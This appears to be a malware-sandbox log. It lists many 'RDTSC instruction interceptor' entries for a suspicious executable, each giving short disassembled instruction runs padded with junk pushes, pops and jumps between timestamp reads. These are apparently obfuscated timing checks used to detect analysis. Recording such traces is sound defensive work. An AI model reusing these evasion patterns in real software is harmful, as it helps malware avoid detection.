Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7733ED second address: 7733F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8CECAE0756h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7733F8 second address: 7733FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7733FE second address: 773402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7738F7 second address: 7738FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7738FB second address: 773915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8CECAE0761h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 773C45 second address: 773C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 773C49 second address: 773C73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CECAE0767h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8CECAE075Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 773C73 second address: 773C79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 773C79 second address: 773CC4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edx, dword ptr [ebp+122D2CB9h] 0x0000000f lea eax, dword ptr [ebp+1247E80Dh] 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F8CECAE0758h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F8CECAE0764h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 773CC4 second address: 773CCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 773CCA second address: 773CE0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8CECAE075Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 773CE0 second address: 773CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 773CE4 second address: 75AD14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push edi 0x00000009 mov dword ptr [ebp+122D1855h], ebx 0x0000000f pop edx 0x00000010 call dword ptr [ebp+1244FE8Eh] 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F8CECAE0763h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7B1433 second address: 7B1437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7B1437 second address: 7B1459 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CECAE075Ch 0x00000007 jc 00007F8CECAE0756h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jno 00007F8CECAE075Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7B48FE second address: 7B4910 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnp 00007F8CEC76E1F6h 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7B9510 second address: 7B951A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7B951A second address: 7B9525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8CEC76E1F6h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 73E44D second address: 73E46F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CECAE0768h 0x00000007 jne 00007F8CECAE0756h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 73E46F second address: 73E482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CEC76E1FFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 73E482 second address: 73E4A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jmp 00007F8CECAE075Ah 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push edx 0x00000019 pop edx 0x0000001a jns 00007F8CECAE0756h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7BC395 second address: 7BC399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7BC399 second address: 7BC39F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7BC39F second address: 7BC3B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8CEC76E203h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7BC3B8 second address: 7BC3C5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jns 00007F8CECAE0756h 0x00000009 pop ecx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7BBF7E second address: 7BBF8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F8CEC76E1F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7BBF8A second address: 7BBF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7BBF8E second address: 7BBFA1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8CEC76E1F6h 0x00000008 jnl 00007F8CEC76E1F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7BC0A3 second address: 7BC0B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F8CECAE0756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7BC0B2 second address: 7BC0BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8CEC76E1F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7BC0BE second address: 7BC0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F8CECAE075Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7BC0D3 second address: 7BC0DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8CEC76E1F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7BE874 second address: 7BE8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CECAE0760h 0x00000009 popad 0x0000000a js 00007F8CECAE076Bh 0x00000010 jmp 00007F8CECAE0763h 0x00000015 push esi 0x00000016 pop esi 0x00000017 js 00007F8CECAE075Eh 0x0000001d jo 00007F8CECAE0756h 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7BE8B6 second address: 7BE8BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7BE358 second address: 7BE35C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7BE35C second address: 7BE362 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7BE362 second address: 7BE36D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7BE36D second address: 7BE37E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F8CEC76E1F8h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7C229C second address: 7C22B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 pushad 0x00000009 jne 00007F8CECAE0758h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7C22B0 second address: 7C22CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8CEC76E1FFh 0x0000000e jng 00007F8CEC76E1F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7C22CE second address: 7C22D8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8CECAE0756h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7C1FF7 second address: 7C1FFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7C1FFB second address: 7C2013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8CECAE075Eh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7C5ED6 second address: 7C5EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7C5EDC second address: 7C5EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7C5EE0 second address: 7C5EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7C5EE9 second address: 7C5EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CECAE0760h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7C5EFF second address: 7C5F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7C5F04 second address: 7C5F3A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F8CECAE0763h 0x00000008 pop edx 0x00000009 pushad 0x0000000a ja 00007F8CECAE0756h 0x00000010 jmp 00007F8CECAE0766h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7C5455 second address: 7C5459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7C5459 second address: 7C5481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F8CECAE0764h 0x0000000e ja 00007F8CECAE0756h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7C5481 second address: 7C549A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CEC76E205h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7C5A95 second address: 7C5A99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7C5A99 second address: 7C5AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7CB621 second address: 7CB63A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jno 00007F8CECAE0758h 0x0000000f jng 00007F8CECAE075Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7C9ED8 second address: 7C9EDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7CA039 second address: 7CA04F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CECAE0762h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7CA04F second address: 7CA058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7CA5AC second address: 7CA5B8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8CECAE0756h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7CA5B8 second address: 7CA5F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jc 00007F8CEC76E1F6h 0x0000000f popad 0x00000010 jmp 00007F8CEC76E204h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b pop eax 0x0000001c push eax 0x0000001d pop eax 0x0000001e jmp 00007F8CEC76E1FBh 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7CA5F1 second address: 7CA5FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jg 00007F8CECAE0756h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 773722 second address: 77373B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8CEC76E1F6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push edx 0x0000000f jnp 00007F8CEC76E1F6h 0x00000015 pop edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 77373B second address: 77378E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CECAE075Ah 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c jo 00007F8CECAE075Ch 0x00000012 sub edx, dword ptr [ebp+122D2CA9h] 0x00000018 mov ebx, dword ptr [ebp+1247E84Ch] 0x0000001e add eax, ebx 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F8CECAE0758h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000017h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a mov dword ptr [ebp+1244FB84h], edi 0x00000040 nop 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push ecx 0x00000045 pop ecx 0x00000046 pushad 0x00000047 popad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 77378E second address: 773793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 773793 second address: 7737D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jns 00007F8CECAE076Eh 0x0000000e nop 0x0000000f mov ecx, 5F78EBB4h 0x00000014 push 00000004h 0x00000016 or edi, dword ptr [ebp+122D1C8Fh] 0x0000001c nop 0x0000001d pushad 0x0000001e push eax 0x0000001f pushad 0x00000020 popad 0x00000021 pop eax 0x00000022 jnl 00007F8CECAE075Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D151F second address: 7D1525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D1525 second address: 7D152A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D1AEE second address: 7D1AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D1DA3 second address: 7D1DB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F8CECAE075Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D2C1C second address: 7D2C3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CEC76E1FAh 0x00000007 jmp 00007F8CEC76E1FEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D2C3D second address: 7D2C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8CECAE0756h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D2C47 second address: 7D2C53 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D2C53 second address: 7D2C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CECAE0761h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D2C68 second address: 7D2C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D834A second address: 7D8354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8CECAE0756h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D8354 second address: 7D8370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CEC76E200h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F8CEC76E1FCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D8370 second address: 7D83A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8CECAE0763h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8CECAE0769h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D83A5 second address: 7D83AB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D83AB second address: 7D83C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CECAE0769h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D83C9 second address: 7D83D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8CEC76E1F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D8519 second address: 7D851D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D8987 second address: 7D899F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8CEC76E202h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D8C71 second address: 7D8C82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CECAE075Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D8C82 second address: 7D8C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D8C8C second address: 7D8C90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D8C90 second address: 7D8C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7D8C96 second address: 7D8CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8CECAE0761h 0x0000000c jg 00007F8CECAE0756h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
